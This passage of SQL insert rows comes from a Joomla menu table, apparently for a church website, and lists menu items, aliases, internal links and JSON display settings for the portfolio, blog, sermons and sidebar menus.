(428, 'portfolio-menu', 'sollicitudin malesuada', 'sollicitudin-malesuada', '', 'sollicitudin-malesuada', 'index.php?option=com_content&view=article&id=80', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 321, 322, 0, '*', 0),
(429, 'portfolio-menu', 'nascetur ridiculus mus', 'nascetur-ridiculus-mus', '', 'nascetur-ridiculus-mus', 'index.php?option=com_content&view=article&id=81', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 323, 324, 0, '*', 0),
(430, 'portfolio-menu', 'Ahem dipisicing elite', 'ahem-dipisicing-elite', '', 'ahem-dipisicing-elite', 'index.php?option=com_content&view=article&id=76', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 305, 306, 0, '*', 0),
(431, 'portfolio-menu', 'Everything should be simple', 'everything-should-be-simple', '', 'everything-should-be-simple', 'index.php?option=com_content&view=article&id=77', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 303, 304, 0, '*', 0),
(434, 'mainmenu', 'Share Your Testimonies', 'testimonies', '', 'contact-us/testimonies', 'index.php?option=com_content&view=article&id=31', 'component', 1, 106, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 398, 399, 0, '*', 0),
(435, 'mainmenu', 'Sermons', 'sermons', '', 'about-us/sermons', 'index.php?option=com_content&view=category&layout=blog&id=32', 'component', 0, 132, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"layout_type\":\"blog\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"0\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"0\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"1\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 22, 23, 0, '*', 0),
(437, 'mainmenu', 'Calendar', 'calendar', '', 'calendar', 'index.php?option=com_jevents&view=month&layout=calendar', 'component', -2, 1, 1, 10224, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"com_calViewName\":\"global\",\"darktemplate\":\"0\",\"com_calUseIconic\":\"1\",\"iconstoshow\":[\"byyear\",\"bymonth\",\"byweek\",\"byday\",\"search\"],\"showyearpast\":\"1\",\"overridelayout\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 115, 116, 0, '*', 0),
(440, 'quickmenu', 'Daily Bible readings', '2012-05-25-16-11-18', '', '2012-05-25-16-11-18', '', 'url', -2, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}', 297, 298, 0, '*', 0),
(442, 'bottommenu', 'Podcast ', 'bottom-blog', '', 'bottom-blog', 'index.php?Itemid=', 'alias', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"aliasoptions\":\"999\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 243, 244, 0, '*', 0),
(443, 'bottommenu', 'Testimonies', 'bottom-testimonies', '', 'bottom-testimonies', 'index.php?Itemid=', 'alias', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"434\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}', 245, 246, 0, '*', 0),
(444, 'bottommenu', 'Video on Demand', 'vod', '', 'vod', 'index.php?Itemid=', 'alias', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"aliasoptions\":\"1000\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 247, 248, 0, '*', 0),
(445, 'bottommenu', 'Spirit Meat', 'spirit-meat', '', 'spirit-meat', 'index.php?Itemid=', 'alias', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"aliasoptions\":\"1001\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 249, 250, 0, '*', 0),
(446, 'bottommenu', 'Downloads', 'downloads', '', 'downloads', 'index.php?Itemid=', 'alias', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"aliasoptions\":\"1073\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 253, 254, 0, '*', 0),
(447, 'bottommenu', 'Contact Us', 'contact-bottom', '', 'contact-bottom', 'index.php?Itemid=', 'alias', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"106\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 255, 256, 0, '*', 0),
(448, 'bottommenu', 'Recent Events', 'bottom-events', '', 'bottom-events', 'index.php?Itemid=', 'alias', 0, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"437\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 251, 252, 0, '*', 0),
(459, 'sidebarmenu', 'Level 3', 'level-3-2', '', 'sample-levels/level-21/level-3-2', 'index.php?option=com_content&view=article&id=5', 'component', 1, 113, 3, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 265, 266, 0, '*', 0),
(622, 'mainmenu', 'Live Blog', 'blog', '', 'resources/blog', 'index.php?option=com_k2&view=latest&layout=latest', 'component', 1, 102, 2, 10279, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"theme\":\"default\",\"source\":\"1\",\"latestItemsCols\":\"2\",\"latestItemsLimit\":\"3\",\"latestItemsDisplayEffect\":\"all\",\"userIDs\":[\"0\"],\"userName\":\"0\",\"userImage\":\"0\",\"userDescription\":\"0\",\"userURL\":\"0\",\"userEmail\":\"0\",\"userFeed\":\"1\",\"categoryIDs\":[\"4\",\"3\",\"1\",\"2\",\"5\"],\"categoryTitle\":\"0\",\"categoryDescription\":\"0\",\"categoryImage\":\"0\",\"categoryFeed\":\"0\",\"latestItemTitle\":\"1\",\"latestItemTitleLinked\":\"1\",\"latestItemDateCreated\":\"1\",\"latestItemImage\":\"1\",\"latestItemImageSize\":\"Medium\",\"latestItemVideo\":\"1\",\"latestItemVideoWidth\":\"\",\"latestItemVideoHeight\":\"\",\"latestItemAudioWidth\":\"\",\"latestItemAudioHeight\":\"\",\"latestItemVideoAutoPlay\":\"0\",\"latestItemIntroText\":\"1\",\"latestItemCategory\":\"1\",\"latestItemTags\":\"0\",\"latestItemReadMore\":\"1\",\"latestItemCommentsAnchor\":\"1\",\"feedLink\":\"1\",\"latestItemK2Plugins\":\"0\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"Life Oasis International Church Live Blog\",\"menu-meta_keywords\":\"lifeoasis, olusola, areogun, oyenike, lifeoasis, dream centre, spiritmeat\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 32, 55, 0, '*', 0),
(623, 'mainmenu', 'Blog Item', 'blog-item', '', 'resources/blog/blog-item', 'index.php?option=com_k2&view=item&layout=item&id=2', 'component', 0, 622, 3, 10279, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 33, 34, 0, '*', 0),
(624, 'mainmenu', 'Blog Items by Tag', 'k2-tag', '', 'resources/blog/k2-tag', 'index.php?option=com_k2&view=itemlist&layout=tag&tag=Themeforest&task=tag', 'component', 0, 622, 3, 10279, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"theme\":\"default\",\"tagOrdering\":\"\",\"tagFeedLink\":\"1\",\"tagFeedIcon\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 39, 40, 0, '*', 0),
(625, 'mainmenu', 'Blog Category', 'blog-category', '', 'resources/blog/blog-category', 'index.php?option=com_k2&view=itemlist&layout=category&task=category&id=4', 'component', 0, 622, 3, 10279, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"categories\":[\"4\"],\"singleCatOrdering\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 35, 36, 0, '*', 0),
(626, 'mainmenu', 'User Page Blog', 'user-page-blog', '', 'resources/blog/user-page-blog', 'index.php?option=com_k2&view=itemlist&layout=user&id=42&task=user', 'component', 0, 622, 3, 10279, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"theme\":\"default\",\"userOrdering\":\"\",\"userFeedLink\":\"1\",\"userFeedIcon\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 37, 38, 0, '*', 0),
(629, 'vertical-menu', 'Home', 'side-home', '', 'side-home', 'index.php?Itemid=', 'alias', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"101\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 325, 326, 0, '*', 0),
(630, 'vertical-menu', 'Features', 'side-features', '', 'side-features', '', 'separator', 0, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 327, 336, 0, '*', 0),
(631, 'vertical-menu', 'Shortcodes', 'side-shortcodes', '', 'side-features/side-shortcodes', 'index.php?Itemid=', 'alias', 0, 630, 2, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"104\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 328, 329, 0, '*', 0),
(632, 'vertical-menu', 'Icon Fonts', 'side-icon-fonts', '', 'side-features/side-icon-fonts', 'index.php?Itemid=', 'alias', 0, 630, 2, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"771\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 330, 331, 0, '*', 0),
(633, 'vertical-menu', 'Module Layouts', 'side-module-layouts', '', 'side-features/side-module-layouts', 'index.php?Itemid=', 'alias', 0, 630, 2, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"103\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 332, 333, 0, '*', 0),
(634, 'vertical-menu', 'Pages', 'pages-side', '', 'pages-side', '', 'separator', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu_image\":\"\",\"menu_text\":1}', 337, 344, 0, '*', 0),
(635, 'vertical-menu', 'Brief History', 'side-brief-history', '', 'pages-side/side-brief-history', 'index.php?Itemid=', 'alias', 1, 634, 2, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"174\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 338, 339, 0, '*', 0),
(636, 'vertical-menu', 'Service Times', 'side-services', '', 'pages-side/side-services', 'index.php?Itemid=', 'alias', 1, 634, 2, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"195\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 340, 341, 0, '*', 0),
(637, 'vertical-menu', 'Testimonies', 'side-testimonies', '', 'pages-side/side-testimonies', 'index.php?Itemid=', 'alias', 1, 634, 2, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"434\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 342, 343, 0, '*', 0),
(639, 'vertical-menu', 'Joomla', 'side-joomla', '', 'side-joomla', 'index.php?Itemid=', 'alias', 0, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"107\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 345, 346, 0, '*', 0),
(640, 'vertical-menu', 'Contact Us', 'side-contact-us', '', 'side-contact-us', 'index.php?Itemid=', 'alias', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"106\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 347, 348, 0, '*', 0),
(696, 'main', 'com_postinstall', 'Post-installation messages', '', 'Post-installation messages', 'index.php?option=com_postinstall', 'component', 1, 1, 1, 32, 0, '0000-00-00 00:00:00', 0, 1, 'class:postinstall', 0, '', 201, 202, 0, '*', 1),
(751, 'mainmenu', 'Contacts', 'contacts', '', 'contacts', 'index.php?Itemid=', 'alias', 0, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"106\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 199, 200, 0, '*', 0),
(752, 'mainmenu', 'Mega Menu', 'mega-menu', '', 'resources/mega-menu', '', 'separator', 0, 102, 2, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"3\",\"icemega_width\":\"660\",\"icemega_colwidth\":\"220,220,220\",\"icemega_cols_items\":\"4,4,1\",\"icemega_subtype\":\"menu\"}', 70, 97, 0, '*', 0),
(753, 'mainmenu', 'Child Item', 'child-item', '', 'resources/mega-menu/child-item', '', 'url', 0, 752, 3, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"subtitle\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 71, 72, 0, '*', 0),
(754, 'mainmenu', 'Child Item', 'child-item-2', '', 'resources/mega-menu/child-item-2', '', 'url', 0, 752, 3, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 73, 74, 0, '*', 0),
(755, 'mainmenu', 'Child Item', 'child-item-3', '', 'resources/mega-menu/child-item-3', '', 'url', 0, 752, 3, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 75, 76, 0, '*', 0),
(756, 'mainmenu', 'Child Item', 'child-item-4', '', 'resources/mega-menu/child-item-4', '', 'url', 0, 752, 3, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 77, 78, 0, '*', 0),
(757, 'mainmenu', 'Child Item', 'child-item-5', '', 'resources/mega-menu/child-item-5', '', 'url', 0, 752, 3, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"subtitle\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 79, 80, 0, '*', 0),
(758, 'mainmenu', 'Child Item', 'child-item-6', '', 'resources/mega-menu/child-item-6', '', 'url', 0, 752, 3, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 81, 82, 0, '*', 0),
(759, 'mainmenu', 'Parent Item', 'child-item-7', '', 'resources/mega-menu/child-item-7', '', 'url', 0, 752, 3, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"220\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 83, 92, 0, '*', 0),
